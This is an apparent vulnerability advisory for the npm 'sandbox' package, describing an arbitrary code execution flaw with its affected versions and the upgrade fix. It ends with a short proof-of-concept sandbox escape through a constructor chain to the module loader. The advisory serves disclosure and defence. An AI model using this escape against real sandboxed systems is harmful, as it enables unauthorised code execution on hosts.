Arbitrary Code Execution Affecting sandbox package, versions <1.0.0-beta.1>=2.0.0-alpha2 <2.0.0
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsSnyk Learn
Learn about Arbitrary Code Execution vulnerabilities in an interactive lesson.
Start learning- Snyk IDnpm:sandbox:20160821
- published7 Nov 2017
- disclosed21 Aug 2016
- creditio void
Introduced: 21 Aug 2016
CVE NOT AVAILABLE CWE-94 (opens in a new tab)How to fix?
Upgrade sandbox to version 1.0.0-beta.1, 2.0.0 or higher.
Overview
sandbox is a nifty javascript sandbox for node.js.
Affected versions of this package are vulnerable to Arbitrary Code Execution. It is possible to escape the sandbox by using a combination of functions and constructors, allowing an attacker to gain access to a process with root permissions and load modules of their choosing to execute malicious code.
Note: In June 2025, Vercel announced the launch of their Sandbox SDK and later, on 2025-10-15, Vercel claimed the name "Sandbox" for the npm package previously maintained by Gianni Chiappetta. This vulnerability concerns the original package, not the Vercel Sandbox.
PoC
new Function("
return (
this.constructor.constructor('
return (this.process.mainModule.constructor._load
)'
)())"
)()
("util").inspect("hi")